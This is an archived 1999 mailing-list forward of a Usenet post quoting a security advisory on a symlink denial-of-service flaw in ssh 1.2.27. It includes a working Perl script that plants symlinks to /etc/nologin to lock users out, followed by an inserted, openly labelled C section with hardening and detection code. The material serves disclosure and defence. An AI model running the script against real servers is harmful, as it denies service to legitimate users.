[Fwd: Truth about ssh 1.2.27 vulnerability]

From: Marc SPARC (marcat_private)
Date: Thu Sep 23 1999 - 19:53:16 PDT


    From: "MEF" <matthew.fearnowat_private>
    Newsgroups: comp.security.ssh
    Subject: Truth about ssh 1.2.27 vulnerability
    Message-ID: <l2rG3.448$f4.1323at_private>
    Date: Thu, 23 Sep 1999 09:45:33 -0500
    
    I received this email today and wanted to know if it is something to be
    concerned about.
    
    
    
    The following security advisory is sent to the securiteam mailing list, and
    can be found at the SecuriTeam web site: http://www.securiteam.com
    
    SSH 1.2.27 vulnerable to a Denial of Service attack
    
    ------------------------------------------------------------
    
    SSH has the option of setting up "authentication sockets", used to pass
    authentication keys securely. When this is used, a socket is created on both
    client and server machines; the socket created on the server uses an easy-to-
    guess filename (based on the PID). The creation of this socket is done while
    the server is acting as root and follows symlinks.
    
    
    ******************************
    
    Exploit:
    
     - connect to remote machine
     - run the following script (creates symlinks for the next 50 PIDs):
    
    ----- cut -----
    #!/usr/bin/perl
    
    $pid = $$;
    
    $whoami = `whoami`;
    chop($whoami);
    mkdir("/tmp/ssh-$whoami", 0700);
    
    for ($i = $pid; $i < $pid+50; $i++)
    {
      symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
    }
    ----- cut -----
    
    
     - on local machine, execute ssh-agent1; it will produce a few lines to cut and paste into your shell.
    
     - ssh1 to the remote machine; enter password
    
    The socket will have been created at /etc/nologin, preventing other non-root users from logging in. This connection too will die with "Logins are currently denied by /etc/nologin:"
    
    This was tested on a RedHat 6.0 machine, with a standard configure/make/install installation of ssh. This script should work pretty well for systems that create processes where each PID is one greater than the last; other platforms may require modifications, or many, many more links, if they're exploitable.
    
    
    
    
    
    
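The advisory's root cause is that the server creates the agent socket at a predictable name, inside a directory the user controls, without checking what is already there. The following C is an added example written for this page, not code from the advisory or from ssh 1.2.27: it shows the hardened setup (an unpredictable private directory verified with lstat, which never follows symlinks), the pre-bind check that rejects a planted symlink, and an audit routine that counts ssh-*-agent symlinks left behind in such a directory. The function names, the `/tmp/ssh-XXXXXX` template and the 512-byte path buffer are assumptions.

```c
#define _DEFAULT_SOURCE
#include <dirent.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened setup: a fresh, unpredictably named 0700 directory, verified with
 * lstat(). tmpl is a mkdtemp() template like "/tmp/ssh-XXXXXX"; returns 0 on success. */
int prepare_agent_dir(char *tmpl, uid_t owner)
{
    struct stat st;
    if (mkdtemp(tmpl) == NULL) return -1;           /* refuses an existing path */
    if (lstat(tmpl, &st) != 0 || !S_ISDIR(st.st_mode))
        return -1;                                  /* a symlink fails S_ISDIR */
    if (st.st_uid != owner || (st.st_mode & (S_IRWXG | S_IRWXO)) != 0)
        return -1;                                  /* wrong owner or too open */
    return 0;
}

/* Pre-bind() check: returns 1 only if nothing exists at the socket path, so a
 * symlink planted as ssh-<pid>-agent is rejected instead of being followed. */
int socket_path_is_clean(const char *path)
{
    struct stat st;
    return lstat(path, &st) != 0 && errno == ENOENT;
}

/* Detection: count symlinks named ssh-*-agent in dir, the residue the
 * advisory's script leaves behind. Returns -1 if dir cannot be read. */
int count_planted_agent_links(const char *dir)
{
    DIR *d = opendir(dir);
    struct dirent *e; struct stat st;
    char path[512]; int n = 0;
    if (d == NULL) return -1;
    while ((e = readdir(d)) != NULL) {
        size_t len = strlen(e->d_name);
        if (len < 10 || strncmp(e->d_name, "ssh-", 4) != 0 ||
            strcmp(e->d_name + len - 6, "-agent") != 0)
            continue;                               /* not an agent socket name */
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        if (lstat(path, &st) == 0 && S_ISLNK(st.st_mode))
            n++;
    }
    closedir(d);
    return n;
}
```

Running `count_planted_agent_links` over each `/tmp/ssh-<user>` directory on a server of that era gives an administrator a quick way to spot the pre-planted links the advisory describes.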



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:11 PDT